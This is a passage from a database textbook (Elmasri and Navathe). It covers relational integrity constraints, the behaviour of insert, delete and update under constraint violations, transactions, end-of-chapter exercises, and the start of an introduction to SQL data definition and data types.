
DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure 7
Referential integrity constraints displayed
on the COMPANY relational database
schema.

The types of constraints we discussed so far may be called state constraints because
they define the constraints that a valid state of the database must satisfy. Another type
of constraint, called transition constraints, can be defined to deal with state changes
in the database.11 An example of a transition constraint is: “the salary of an employee
can only increase.” Such constraints are typically enforced by the application pro-
grams or specified using active rules and triggers.

3 Update Operations, Transactions,
and Dealing with Constraint Violations

The operations of the relational model can be categorized into retrievals and
updates. The relational algebra operations, which can be used to specify retrievals.
A relational algebra expression forms a new relation after applying a number of
algebraic operators to an existing set of relations; its main use is for querying a data-
base to retrieve information. The user formulates a query that specifies the data of
interest, and a new relation is formed by applying relational operators to retrieve
this data. That result relation becomes the answer to (or result of) the user’s query.

11State constraints are sometimes called static constraints, and transition constraints are sometimes
called dynamic constraints.

71

The Relational Data Model and Relational Database Constraints

The language called relational calculus is used to define the new relation declara-
tively without giving a specific order of operations.

In this section, we concentrate on the database modification or update operations.
There are three basic operations that can change the states of relations in the data-
base: Insert, Delete, and Update (or Modify). They insert new data, delete old data,
or modify existing data records. Insert is used to insert one or more new tuples in a
relation, Delete is used to delete tuples, and Update (or Modify) is used to change
the values of some attributes in existing tuples. Whenever these operations are
applied, the integrity constraints specified on the relational database schema should
not be violated. In this section we discuss the types of constraints that may be vio-
lated by each of these operations and the types of actions that may be taken if an
operation causes a violation. We use the database shown in Figure 6 for examples
and discuss only key constraints, entity integrity constraints, and the referential
integrity constraints shown in Figure 7. For each type of operation, we give some
examples and discuss any constraints that each operation may violate.

3.1 The Insert Operation
The Insert operation provides a list of attribute values for a new tuple t that is to be
inserted into a relation R. Insert can violate any of the four types of constraints dis-
cussed in the previous section. Domain constraints can be violated if an attribute
value is given that does not appear in the corresponding domain or is not of the
appropriate data type. Key constraints can be violated if a key value in the new tuple
t already exists in another tuple in the relation r(R). Entity integrity can be violated
if any part of the primary key of the new tuple t is NULL. Referential integrity can be
violated if the value of any foreign key in t refers to a tuple that does not exist in the
referenced relation. Here are some examples to illustrate this discussion.

■ Operation:
Insert <‘Cecilia’, ‘F’, ‘Kolonsky’, NULL, ‘1960-04-05’, ‘6357 Windy Lane, Katy, TX’, F, 28000, NULL, 4> into EMPLOYEE.
Result: This insertion violates the entity integrity constraint (NULL for the
primary key Ssn), so it is rejected.

■ Operation:
Insert <‘Alicia’, ‘J’, ‘Zelaya’, ‘999887777’, ‘1960-04-05’, ‘6357 Windy Lane, Katy, TX’, F, 28000, ‘987654321’, 4> into EMPLOYEE.
Result: This insertion violates the key constraint because another tuple with
the same Ssn value already exists in the EMPLOYEE relation, and so it is
rejected.

■ Operation:
Insert <‘Cecilia’, ‘F’, ‘Kolonsky’, ‘677678989’, ‘1960-04-05’, ‘6357 Windswept, Katy, TX’, F, 28000, ‘987654321’, 7> into EMPLOYEE.
Result: This insertion violates the referential integrity constraint specified on
Dno in EMPLOYEE because no corresponding referenced tuple exists in
DEPARTMENT with Dnumber = 7.

72

The Relational Data Model and Relational Database Constraints

■ Operation:
Insert <‘Cecilia’, ‘F’, ‘Kolonsky’, ‘677678989’, ‘1960-04-05’, ‘6357 Windy Lane, Katy, TX’, F, 28000, NULL, 4> into EMPLOYEE.
Result: This insertion satisfies all constraints, so it is acceptable.

If an insertion violates one or more constraints, the default option is to reject the
insertion. In this case, it would be useful if the DBMS could provide a reason to
the user as to why the insertion was rejected. Another option is to attempt to correct
the reason for rejecting the insertion, but this is typically not used for violations
caused by Insert; rather, it is used more often in correcting violations for Delete and
Update. In the first operation, the DBMS could ask the user to provide a value for
Ssn, and could then accept the insertion if a valid Ssn value is provided. In opera-
tion 3, the DBMS could either ask the user to change the value of Dno to some valid
value (or set it to NULL), or it could ask the user to insert a DEPARTMENT tuple with
Dnumber = 7 and could accept the original insertion only after such an operation
was accepted. Notice that in the latter case the insertion violation can cascade back
to the EMPLOYEE relation if the user attempts to insert a tuple for department 7
with a value for Mgr_ssn that does not exist in the EMPLOYEE relation.

3.2 The Delete Operation
The Delete operation can violate only referential integrity. This occurs if the tuple
being deleted is referenced by foreign keys from other tuples in the database. To
specify deletion, a condition on the attributes of the relation selects the tuple (or
tuples) to be deleted. Here are some examples.

■ Operation:
Delete the WORKS_ON tuple with Essn = ‘999887777’ and Pno = 10.
Result: This deletion is acceptable and deletes exactly one tuple.

■ Operation:
Delete the EMPLOYEE tuple with Ssn = ‘999887777’.
Result: This deletion is not acceptable, because there are tuples in
WORKS_ON that refer to this tuple. Hence, if the tuple in EMPLOYEE is
deleted, referential integrity violations will result.

■ Operation:
Delete the EMPLOYEE tuple with Ssn = ‘333445555’.
Result: This deletion will result in even worse referential integrity violations,
because the tuple involved is referenced by tuples from the EMPLOYEE,
DEPARTMENT, WORKS_ON, and DEPENDENT relations.

Several options are available if a deletion operation causes a violation. The first
option, called restrict, is to reject the deletion. The second option, called cascade, is
to attempt to cascade (or propagate) the deletion by deleting tuples that reference the
tuple that is being deleted. For example, in operation 2, the DBMS could automati-
cally delete the offending tuples from WORKS_ON with Essn = ‘999887777’. A third
option, called set null or set default, is to modify the referencing attribute values that
cause the violation; each such value is either set to NULL or changed to reference

73

The Relational Data Model and Relational Database Constraints

another default valid tuple. Notice that if a referencing attribute that causes a viola-
tion is part of the primary key, it cannot be set to NULL; otherwise, it would violate
entity integrity.

Combinations of these three options are also possible. For example, to avoid having
operation 3 cause a violation, the DBMS may automatically delete all tuples from
WORKS_ON and DEPENDENT with Essn = ‘333445555’. Tuples in EMPLOYEE with
Super_ssn = ‘333445555’ and the tuple in DEPARTMENT with Mgr_ssn = ‘333445555’
can have their Super_ssn and Mgr_ssn values changed to other valid values or to
NULL. Although it may make sense to delete automatically the WORKS_ON and
DEPENDENT tuples that refer to an EMPLOYEE tuple, it may not make sense to
delete other EMPLOYEE tuples or a DEPARTMENT tuple.

In general, when a referential integrity constraint is specified in the DDL, the DBMS
will allow the database designer to specify which of the options applies in case of a
violation of the constraint.

3.3 The Update Operation
The Update (or Modify) operation is used to change the values of one or more
attributes in a tuple (or tuples) of some relation R. It is necessary to specify a condi-
tion on the attributes of the relation to select the tuple (or tuples) to be modified.
Here are some examples.

■ Operation:
Update the salary of the EMPLOYEE tuple with Ssn = ‘999887777’ to 28000.
Result: Acceptable.

■ Operation:
Update the Dno of the EMPLOYEE tuple with Ssn = ‘999887777’ to 1.
Result: Acceptable.

■ Operation:
Update the Dno of the EMPLOYEE tuple with Ssn = ‘999887777’ to 7.
Result: Unacceptable, because it violates referential integrity.

■ Operation:
Update the Ssn of the EMPLOYEE tuple with Ssn = ‘999887777’ to
‘987654321’.
Result: Unacceptable, because it violates primary key constraint by repeating
a value that already exists as a primary key in another tuple; it violates refer-
ential integrity constraints because there are other relations that refer to the
existing value of Ssn.

Updating an attribute that is neither part of a primary key nor of a foreign key usually
causes no problems; the DBMS need only check to confirm that the new value is of
the correct data type and domain. Modifying a primary key value is similar to delet-
ing one tuple and inserting another in its place because we use the primary key to
identify tuples. Hence, the issues discussed earlier in both Sections 3.1 (Insert) and
3.2 (Delete) come into play. If a foreign key attribute is modified, the DBMS must

74

The Relational Data Model and Relational Database Constraints

make sure that the new value refers to an existing tuple in the referenced relation (or
is set to NULL). Similar options exist to deal with referential integrity violations
caused by Update as those options discussed for the Delete operation. In fact, when
a referential integrity constraint is specified in the DDL, the DBMS will allow the
user to choose separate options to deal with a violation caused by Delete and a vio-
lation caused by Update.

3.4 The Transaction Concept
A database application program running against a relational database typically exe-
cutes one or more transactions. A transaction is an executing program that includes
some database operations, such as reading from the database, or applying inser-
tions, deletions, or updates to the database. At the end of the transaction, it must
leave the database in a valid or consistent state that satisfies all the constraints spec-
ified on the database schema. A single transaction may involve any number of
retrieval operations (as part of relational algebra and calculus, and as a part of the
language SQL), and any number of update operations. These retrievals and updates
will together form an atomic unit of work against the database. For example, a
transaction to apply a bank withdrawal will typically read the user account record,
check if there is a sufficient balance, and then update the record by the withdrawal
amount.

A large number of commercial applications running against relational databases in
online transaction processing (OLTP) systems are executing transactions at rates
that reach several hundred per second.

4 Summary
In this chapter we presented the modeling concepts, data structures, and constraints
provided by the relational model of data. We started by introducing the concepts of
domains, attributes, and tuples. Then, we defined a relation schema as a list of
attributes that describe the structure of a relation. A relation, or relation state, is a
set of tuples that conforms to the schema.

Several characteristics differentiate relations from ordinary tables or files. The first
is that a relation is not sensitive to the ordering of tuples. The second involves the
ordering of attributes in a relation schema and the corresponding ordering of values
within a tuple. We gave an alternative definition of relation that does not require
these two orderings, but we continued to use the first definition, which requires
attributes and tuple values to be ordered, for convenience. Then, we discussed val-
ues in tuples and introduced NULL values to represent missing or unknown infor-
mation. We emphasized that NULL values should be avoided as much as possible.

We classified database constraints into inherent model-based constraints, explicit
schema-based constraints, and application-based constraints, otherwise known as
semantic constraints or business rules. Then, we discussed the schema constraints

75

The Relational Data Model and Relational Database Constraints

pertaining to the relational model, starting with domain constraints, then key con-
straints, including the concepts of superkey, candidate key, and primary key, and the
NOT NULL constraint on attributes. We defined relational databases and relational
database schemas. Additional relational constraints include the entity integrity con-
straint, which prohibits primary key attributes from being NULL. We described the
interrelation referential integrity constraint, which is used to maintain consistency
of references among tuples from different relations.

The modification operations on the relational model are Insert, Delete, and Update.
Each operation may violate certain types of constraints (refer to Section 3).
Whenever an operation is applied, the database state after the operation is executed
must be checked to ensure that no constraints have been violated. Finally, we intro-
duced the concept of a transaction, which is important in relational DBMSs because
it allows the grouping of several database operations into a single atomic action on
the database.

Review Questions
1. Define the following terms as they apply to the relational model of data:

domain, attribute, n-tuple, relation schema, relation state, degree of a relation,
relational database schema, and relational database state.

2. Why are tuples in a relation not ordered?

3. Why are duplicate tuples not allowed in a relation?

4. What is the difference between a key and a superkey?

5. Why do we designate one of the candidate keys of a relation to be the pri-
mary key?

6. Discuss the characteristics of relations that make them different from ordi-
nary tables and files.

7. Discuss the various reasons that lead to the occurrence of NULL values in
relations.

8. Discuss the entity integrity and referential integrity constraints. Why is each
considered important?

9. Define foreign key. What is this concept used for?

10. What is a transaction? How does it differ from an Update operation?

Exercises
11. Suppose that each of the following Update operations is applied directly to

the database state shown in Figure 6. Discuss all integrity constraints vio-
lated by each operation, if any, and the different ways of enforcing these con-
straints.

76

The Relational Data Model and Relational Database Constraints

a. Insert <‘Robert’, ‘F’, ‘Scott’, ‘943775543’, ‘1972-06-21’, ‘2365 Newcastle Rd, Bellaire, TX’, M, 58000, ‘888665555’, 1> into EMPLOYEE.

b. Insert <‘ProductA’, 4, ‘Bellaire’, 2> into PROJECT.

c. Insert <‘Production’, 4, ‘943775543’, ‘2007-10-01’> into DEPARTMENT.

d. Insert <‘677678989’, NULL, ‘40.0’> into WORKS_ON.

e. Insert <‘453453453’, ‘John’, ‘M’, ‘1990-12-12’, ‘spouse’> into DEPENDENT.

f. Delete the WORKS_ON tuples with Essn = ‘333445555’.

g. Delete the EMPLOYEE tuple with Ssn = ‘987654321’.

h. Delete the PROJECT tuple with Pname = ‘ProductX’.

i. Modify the Mgr_ssn and Mgr_start_date of the DEPARTMENT tuple with
Dnumber = 5 to ‘123456789’ and ‘2007-10-01’, respectively.

j. Modify the Super_ssn attribute of the EMPLOYEE tuple with Ssn =
‘999887777’ to ‘943775543’.

k. Modify the Hours attribute of the WORKS_ON tuple with Essn =
‘999887777’ and Pno = 10 to ‘5.0’.

12. Consider the AIRLINE relational database schema shown in Figure 8, which
describes a database for airline flight information. Each FLIGHT is identified
by a Flight_number, and consists of one or more FLIGHT_LEGs with
Leg_numbers 1, 2, 3, and so on. Each FLIGHT_LEG has scheduled arrival and
departure times, airports, and one or more LEG_INSTANCEs—one for each
Date on which the flight travels. FAREs are kept for each FLIGHT. For each
FLIGHT_LEG instance, SEAT_RESERVATIONs are kept, as are the AIRPLANE
used on the leg and the actual arrival and departure times and airports. An
AIRPLANE is identified by an Airplane_id and is of a particular
AIRPLANE_TYPE. CAN_LAND relates AIRPLANE_TYPEs to the AIRPORTs at
which they can land. An AIRPORT is identified by an Airport_code. Consider
an update for the AIRLINE database to enter a reservation on a particular
flight or flight leg on a given date.

a. Give the operations for this update.

b. What types of constraints would you expect to check?

c. Which of these constraints are key, entity integrity, and referential
integrity constraints, and which are not?

d. Specify all the referential integrity constraints that hold on the schema
shown in Figure 8.

13. Consider the relation CLASS(Course#, Univ_Section#, Instructor_name,
Semester, Building_code, Room#, Time_period, Weekdays, Credit_hours). This
represents classes taught in a university, with unique Univ_section#s. Identify
what you think should be various candidate keys, and write in your own
words the conditions or assumptions under which each candidate key would
be valid.

77

The Relational Data Model and Relational Database Constraints

AIRPORT
Airport_code Name City State

Flight_number Airline Weekdays

FLIGHT

FLIGHT_LEG
Flight_number Leg_number Departure_airport_code Scheduled_departure_time

Scheduled_arrival_timeArrival_airport_code

LEG_INSTANCE

Flight_number Leg_number Date Number_of_available_seats Airplane_id

FARE

Flight_number Fare_code Amount Restrictions

AIRPLANE_TYPE
Airplane_type_name Max_seats Company

CAN_LAND
Airplane_type_name Airport_code

AIRPLANE
Airplane_id Total_number_of_seats Airplane_type

SEAT_RESERVATION
Leg_number Date Seat_number Customer_name Customer_phoneFlight_number

Arrival_timeArrival_airport_codeDeparture_timeDeparture_airport_code

Figure 8
The AIRLINE relational database schema.

14. Consider the following six relations for an order-processing database appli-
cation in a company:

CUSTOMER(Cust#, Cname, City)
ORDER(Order#, Odate, Cust#, Ord_amt)
ORDER_ITEM(Order#, Item#, Qty)

78

The Relational Data Model and Relational Database Constraints

ITEM(Item#, Unit_price)
SHIPMENT(Order#, Warehouse#, Ship_date)
WAREHOUSE(Warehouse#, City)

Here, Ord_amt refers to total dollar amount of an order; Odate is the date the
order was placed; and Ship_date is the date an order (or part of an order) is
shipped from the warehouse. Assume that an order can be shipped from sev-
eral warehouses. Specify the foreign keys for this schema, stating any
assumptions you make. What other constraints can you think of for this
database?

15. Consider the following relations for a database that keeps track of business
trips of salespersons in a sales office:

SALESPERSON(Ssn, Name, Start_year, Dept_no)
TRIP(Ssn, From_city, To_city, Departure_date, Return_date, Trip_id)
EXPENSE(Trip_id, Account#, Amount)

A trip can be charged to one or more accounts. Specify the foreign keys for
this schema, stating any assumptions you make.

16. Consider the following relations for a database that keeps track of student
enrollment in courses and the books adopted for each course:

STUDENT(Ssn, Name, Major, Bdate)
COURSE(Course#, Cname, Dept)
ENROLL(Ssn, Course#, Quarter, Grade)
BOOK_ADOPTION(Course#, Quarter, Book_isbn)
TEXT(Book_isbn, Book_title, Publisher, Author)

Specify the foreign keys for this schema, stating any assumptions you make.

17. Consider the following relations for a database that keeps track of automo-
bile sales in a car dealership (OPTION refers to some optional equipment
installed on an automobile):

CAR(Serial_no, Model, Manufacturer, Price)
OPTION(Serial_no, Option_name, Price)
SALE(Salesperson_id, Serial_no, Date, Sale_price)
SALESPERSON(Salesperson_id, Name, Phone)

First, specify the foreign keys for this schema, stating any assumptions you
make. Next, populate the relations with a few sample tuples, and then give an
example of an insertion in the SALE and SALESPERSON relations that
violates the referential integrity constraints and of another insertion that
does not.

18. Database design often involves decisions about the storage of attributes. For
example, a Social Security number can be stored as one attribute or split into
three attributes (one for each of the three hyphen-delineated groups of
numbers in a Social Security number—XXX-XX-XXXX). However, Social
Security numbers are usually represented as just one attribute. The decision

79

The Relational Data Model and Relational Database Constraints

is based on how the database will be used. This exercise asks you to think
about specific situations where dividing the SSN is useful.

19. Consider a STUDENT relation in a UNIVERSITY database with the following
attributes (Name, Ssn, Local_phone, Address, Cell_phone, Age, Gpa). Note that
the cell phone may be from a different city and state (or province) from the
local phone. A possible tuple of the relation is shown below:

Name Ssn Local_phone Address Cell_phone Age Gpa
George Shaw 123-45-6789 555-1234 123 Main St., 555-4321 19 3.75
William Edwards Anytown, CA 94539

a. Identify the critical missing information from the Local_phone and
Cell_phone attributes. (Hint: How do you call someone who lives in a dif-
ferent state or province?)

b. Would you store this additional information in the Local_phone and
Cell_phone attributes or add new attributes to the schema for STUDENT?

c. Consider the Name attribute. What are the advantages and disadvantages
of splitting this field from one attribute into three attributes (first name,
middle name, and last name)?

d. What general guideline would you recommend for deciding when to store
information in a single attribute and when to split the information?

e. Suppose the student can have between 0 and 5 phones. Suggest two differ-
ent designs that allow this type of information.

20. Recent changes in privacy laws have disallowed organizations from using
Social Security numbers to identify individuals unless certain restrictions are
satisfied. As a result, most U.S. universities cannot use SSNs as primary keys
(except for financial data). In practice, Student_id, a unique identifier
assigned to every student, is likely to be used as the primary key rather than
SSN since Student_id can be used throughout the system.

a. Some database designers are reluctant to use generated keys (also known
as surrogate keys) for primary keys (such as Student_id) because they are
artificial. Can you propose any natural choices of keys that can be used to
identify the student record in a UNIVERSITY database?

b. Suppose that you are able to guarantee uniqueness of a natural key that
includes last name. Are you guaranteed that the last name will not change
during the lifetime of the database? If last name can change, what solu-
tions can you propose for creating a primary key that still includes last
name but remains unique?

c. What are the advantages and disadvantages of using generated (surro-
gate) keys?

80

The Relational Data Model and Relational Database Constraints

Selected Bibliography
The relational model was introduced by Codd (1970) in a classic paper. Codd also
introduced relational algebra and laid the theoretical foundations for the relational
model in a series of papers (Codd 1971, 1972, 1972a, 1974); he was later given the
Turing Award, the highest honor of the ACM (Association for Computing
Machinery) for his work on the relational model. In a later paper, Codd (1979) dis-
cussed extending the relational model to incorporate more meta-data and seman-
tics about the relations; he also proposed a three-valued logic to deal with
uncertainty in relations and incorporating NULLs in the relational algebra. The
resulting model is known as RM/T. Childs (1968) had earlier used set theory to
model databases. Later, Codd (1990) published a book examining over 300 features
of the relational data model and database systems. Date (2001) provides a retro-
spective review and analysis of the relational data model.

Since Codd’s pioneering work, much research has been conducted on various
aspects of the relational model. Todd (1976) describes an experimental DBMS
called PRTV that directly implements the relational algebra operations. Schmidt
and Swenson (1975) introduce additional semantics into the relational model by
classifying different types of relations. Chen’s (1976) Entity-Relationship model is a
means to communicate the real-world semantics of a relational database at the con-
ceptual level. Wiederhold and Elmasri (1979) introduce various types of connec-
tions between relations to enhance its constraints. Maier (1983) and Atzeni and De
Antonellis (1993) provide an extensive theoretical treatment of the relational data
model.

81

Basic SQL

The SQL language may be considered one of themajor reasons for the commercial success of rela-
tional databases. Because it became a standard for relational databases, users were
less concerned about migrating their database applications from other types of
database systems—for example, network or hierarchical systems—to relational sys-
tems. This is because even if the users became dissatisfied with the particular rela-
tional DBMS product they were using, converting to another relational DBMS
product was not expected to be too expensive and time-consuming because both
systems followed the same language standards. In practice, of course, there are many
differences between various commercial relational DBMS packages. However, if the
user is diligent in using only those features that are part of the standard, and if both
relational systems faithfully support the standard, then conversion between the two
systems should be much simplified. Another advantage of having such a standard is
that users may write statements in a database application program that can access
data stored in two or more relational DBMSs without having to change the database
sublanguage (SQL) if both relational DBMSs support standard SQL.

This chapter presents the main features of the SQL standard for commercial rela-
tional DBMSs. It is beyond the scope of this chapter to discuss the relational algebra
operations, which are very important for understanding the types of requests that
may be specified on a relational database. They are also important for query pro-
cessing and optimization in a relational DBMS. However, the relational algebra
operations are considered to be too technical for most commercial DBMS users
because a query in relational algebra is written as a sequence of operations that,
when executed, produces the required result. Hence, the user must specify how—
that is, in what order—to execute the query operations. On the other hand, the SQL
language provides a higher-level declarative language interface, so the user only

From Chapter 4 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

82

Basic SQL

specifies what the result is to be, leaving the actual optimization and decisions on
how to execute the query to the DBMS. Although SQL includes some features from
relational algebra, it is based to a greater extent on the tuple relational calculus.
However, the SQL syntax is more user-friendly than either of the two formal
languages.

The name SQL is presently expanded as Structured Query Language. Originally,
SQL was called SEQUEL (Structured English QUEry Language) and was designed
and implemented at IBM Research as the interface for an experimental relational
database system called SYSTEM R. SQL is now the standard language for commer-
cial relational DBMSs. A joint effort by the American National Standards Institute
(ANSI) and the International Standards Organization (ISO) has led to a standard
version of SQL (ANSI 1986), called SQL-86 or SQL1. A revised and much expanded
standard called SQL-92 (also referred to as SQL2) was subsequently developed. The
next standard that is well-recognized is SQL:1999, which started out as SQL3. Two
later updates to the standard are SQL:2003 and SQL:2006, which added XML fea-
tures among other updates to the language. Another update in 2008 incorporated
more object database features in SQL. We will try to cover the latest version of SQL
as much as possible.

SQL is a comprehensive database language: It has statements for data definitions,
queries, and updates. Hence, it is both a DDL and a DML. In addition, it has facili-
ties for defining views on the database, for specifying security and authorization, for
defining integrity constraints, and for specifying transaction controls. It also has
rules for embedding SQL statements into a general-purpose programming language
such as Java, COBOL, or C/C++.1

The later SQL standards (starting with SQL:1999) are divided into a core specifica-
tion plus specialized extensions. The core is supposed to be implemented by all
RDBMS vendors that are SQL compliant. The extensions can be implemented as
optional modules to be purchased independently for specific database applications
such as data mining, spatial data, temporal data, data warehousing, online analytical
processing (OLAP), multimedia data, and so on.

Because SQL is very important (and quite large), we cannot cover all its features in
this chapter. Section 1 describes the SQL DDL commands for creating schemas and
tables, and gives an overview of the basic data types in SQL. Section 2 presents how
basic constraints such as key and referential integrity are specified. Section 3
describes the basic SQL constructs for specifying retrieval queries, and Section 4
describes the SQL commands for insertion, deletion, and data updates.

Not covered are the more complex SQL retrieval queries, as well as the ALTER com-
mands for changing the schema, the CREATE ASSERTION statement, which allows
the specification of more general constraints on the database, the concept of trig-
gers, and the SQL facility for defining views on the database. Views are also called

1Originally, SQL had statements for creating and dropping indexes on the files that represent relations,
but these have been dropped from the SQL standard for some time.

83

Basic SQL

virtual or derived tables because they present the user with what appear to be tables;
however, the information in those tables is derived from previously defined tables.

Section 5 lists some SQL features not detailed in this chapter; these include transac-
tion control, security/authorization, active databases (triggers), object-oriented fea-
tures, and online analytical processing (OLAP) features. Section 6 summarizes the
chapter.

1 SQL Data Definition and Data Types
SQL uses the terms table, row, and column for the formal relational model terms
relation, tuple, and attribute, respectively. We will use the corresponding terms inter-
changeably. The main SQL command for data definition is the CREATE statement,
which can be used to create schemas, tables (relations), and domains (as well as
other constructs such as views, assertions, and triggers). Before we describe the rel-
evant CREATE statements, we discuss schema and catalog concepts in Section 1.1 to
place our discussion in perspective. Section 1.2 describes how tables are created, and
Section 1.3 describes the most important data types available for attribute specifica-
tion. Because the SQL specification is very large, we give a description of the most
important features. Further details can be found in the various SQL standards doc-
uments (see end-of-chapter bibliographic notes).

1.1 Schema and Catalog Concepts in SQL
Early versions of SQL did not include the concept of a relational database schema; all
tables (relations) were considered part of the same schema. The concept of an SQL
schema was incorporated starting with SQL2 in order to group together tables and
other constructs that belong to the same database application. An SQL schema is
identified by a schema name, and includes an authorization identifier to indicate
the user or account who owns the schema, as well as descriptors for each element in
the schema. Schema elements include tables, constraints, views, domains, and other
constructs (such as authorization grants) that describe the schema. A schema is cre-
ated via the CREATE SCHEMA statement, which can include all the schema elements’
definitions. Alternatively, the schema can be assigned a name and authorization
identifier, and the elements can be defined later. For example, the following state-
ment creates a schema called COMPANY, owned by the user with authorization iden-
tifier ‘Jsmith’. Note that each statement in SQL ends with a semicolon.

CREATE SCHEMA COMPANY AUTHORIZATION ‘Jsmith’;

In general, not all users are authorized to create schemas and schema elements. The
privilege to create schemas, tables, and other constructs must be explicitly granted
to the relevant user accounts by the system administrator or DBA.

84

Basic SQL

In addition to the concept of a schema, SQL uses the concept of a catalog—a named
collection of schemas in an SQL environment. An SQL environment is basically an
installation of an SQL-compliant RDBMS on a computer system.2 A catalog always
contains a special schema called INFORMATION_SCHEMA, which provides informa-
tion on all the schemas in the catalog and all the element descriptors in these
schemas. Integrity constraints such as referential integrity can be defined between
relations only if they exist in schemas within the same catalog. Schemas within the
same catalog can also share certain elements, such as domain definitions.

1.2 The CREATE TABLE Command in SQL
The CREATE TABLE command is used to specify a new relation by giving it a name
and specifying its attributes and initial constraints. The attributes are specified first,
and each attribute is given a name, a data type to specify its domain of values, and
any attribute constraints, such as NOT NULL. The key, entity integrity, and referen-
tial integrity constraints can be specified within the CREATE TABLE statement after
the attributes are declared, or they can be added later using the ALTER TABLE com-
mand. Figure 1 shows sample data definition statements in SQL for the COMPANY
relational database schema shown in Figure A.1 in Appendix: Figures at the end of
this chapter.

Typically, the SQL schema in which the relations are declared is implicitly specified
in the environment in which the CREATE TABLE statements are executed.
Alternatively, we can explicitly attach the schema name to the relation name, sepa-
rated by a period. For example, by writing

CREATE TABLE COMPANY.EMPLOYEE …

rather than

CREATE TABLE EMPLOYEE …

as in Figure 1, we can explicitly (rather than implicitly) make the EMPLOYEE table
part of the COMPANY schema.

The relations declared through CREATE TABLE statements are called base tables (or
base relations); this means that the relation and its tuples are actually created and
stored as a file by the DBMS. Base relations are distinguished from virtual relations,
created through the CREATE VIEW statement, which may or may not correspond to
an actual physical file. In SQL, the attributes in a base table are considered to be
ordered in the sequence in which they are specified in the CREATE TABLE statement.
However, rows (tuples) are not considered to be ordered within a relation.

It is important to note that in Figure 1, there are some foreign keys that may cause
errors because they are specified either via circular references or because they refer
to a table that has not yet been created. For example, the foreign key Super_ssn in
the EMPLOYEE table is a circular reference because it refers to the table itself. The
foreign key Dno in the EMPLOYEE table refers to the DEPARTMENT table, which has

2SQL also includes the concept of a cluster of catalogs within an environment.

85

Basic SQL

CREATE TABLE EMPLOYEE
( Fname VARCHAR(15) NOT NULL,

Minit CHAR,
Lname VARCHAR(15) NOT NULL,
Ssn CHAR(9) NOT NULL,
Bdate DATE,
Address VARCHAR(30),
Sex CHAR,
Salary DECIMAL(10,2),
Super_ssn CHAR(9),
Dno INT NOT NULL,

PRIMARY KEY (Ssn),
FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn),
FOREIGN KEY (Dno) REFERENCES DEPARTMENT(Dnumber) );

CREATE TABLE DEPARTMENT
( Dname VARCHAR(15) NOT NULL,

Dnumber INT NOT NULL,
Mgr_ssn CHAR(9) NOT NULL,
Mgr_start_date DATE,

PRIMARY KEY (Dnumber),
UNIQUE (Dname),
FOREIGN KEY (Mgr_ssn) REFERENCES EMPLOYEE(Ssn) );

CREATE TABLE DEPT_LOCATIONS
( Dnumber INT NOT NULL,

Dlocation VARCHAR(15) NOT NULL,
PRIMARY KEY (Dnumber, Dlocation),
FOREIGN KEY (Dnumber) REFERENCES DEPARTMENT(Dnumber) );

CREATE TABLE PROJECT
( Pname VARCHAR(15) NOT NULL,

Pnumber INT NOT NULL,
Plocation VARCHAR(15),
Dnum INT NOT NULL,

PRIMARY KEY (Pnumber),
UNIQUE (Pname),
FOREIGN KEY (Dnum) REFERENCES DEPARTMENT(Dnumber) );

CREATE TABLE WORKS_ON
( Essn CHAR(9) NOT NULL,

Pno INT NOT NULL,
Hours DECIMAL(3,1) NOT NULL,

PRIMARY KEY (Essn, Pno),
FOREIGN KEY (Essn) REFERENCES EMPLOYEE(Ssn),
FOREIGN KEY (Pno) REFERENCES PROJECT(Pnumber) );

CREATE TABLE DEPENDENT
( Essn CHAR(9) NOT NULL,

Dependent_name VARCHAR(15) NOT NULL,
Sex CHAR,
Bdate DATE,
Relationship VARCHAR(8),

PRIMARY KEY (Essn, Dependent_name),
FOREIGN KEY (Essn) REFERENCES EMPLOYEE(Ssn) );

Figure 1
SQL CREATE TABLE
data definition state-
ments for defining the
COMPANY schema
from Figure A.1.

86

Basic SQL

not been created yet. To deal with this type of problem, these constraints can be left
out of the initial CREATE TABLE statement, and then added later using the ALTER
TABLE statement. We displayed all the foreign keys in Figure 1 to show the complete
COMPANY schema in one place.

1.3 Attribute Data Types and Domains in SQL
The basic data types available for attributes include numeric, character string, bit
string, Boolean, date, and time.

■ Numeric data types include integer numbers of various sizes (INTEGER or
INT, and SMALLINT) and floating-point (real) numbers of various precision
(FLOAT or REAL, and DOUBLE PRECISION). Formatted numbers can be
declared by using DECIMAL(i,j)—or DEC(i,j) or NUMERIC(i,j)—where i, the
precision, is the total number of decimal digits and j, the scale, is the number
of digits after the decimal point. The default for scale is zero, and the default
for precision is implementation-defined.

■ Character-string data types are either fixed length—CHAR(n) or
CHARACTER(n), where n is the number of characters—or varying length—
VARCHAR(n) or CHAR VARYING(n) or CHARACTER VARYING(n), where n is
the maximum number of characters. When specifying a literal string value, it
is placed between single quotation marks (apostrophes), and it is case sensi-
tive (a distinction is made between uppercase and lowercase).3 For fixed-
length strings, a shorter string is padded with blank characters to the right.
For example, if the value ‘Smith’ is for an attribute of type CHAR(10), it is
padded with five blank characters to become ‘Smith ’ if needed. Padded
blanks are generally ignored when strings are compared. For comparison
purposes, strings are considered ordered in alphabetic (or lexicographic)
order; if a string str1 appears before another string str2 in alphabetic order,
then str1 is considered to be less than str2.4 There is also a concatenation
operator denoted by || (double vertical bar) that can concatenate two strings
in SQL. For example, ‘abc’ || ‘XYZ’ results in a single string ‘abcXYZ’. Another
variable-length string data type called CHARACTER LARGE OBJECT or
CLOB is also available to specify columns that have large text values, such as
documents. The CLOB maximum length can be specified in kilobytes (K),
megabytes (M), or gigabytes (G). For example, CLOB(20M) specifies a max-
imum length of 20 megabytes.

■ Bit-string data types are either of fixed length n—BIT(n)—or varying
length—BIT VARYING(n), where n is the maximum number of bits. The
default for n, the length of a character string or bit string, is 1. Literal bit
strings are placed between single quotes but preceded by a B to distinguish

3This is not the case with SQL keywords, such as CREATE or CHAR. With keywords, SQL is case insen-
sitive, meaning that SQL treats uppercase and lowercase letters as equivalent in keywords.
4For nonalphabetic characters, there is a defined order.

87

Basic SQL

them from character strings; for example, B‘10101’.5 Another variable-length
bitstring data type called BINARY LARGE OBJECT or BLOB is also available
to specify columns that have large binary values, such as images. As for
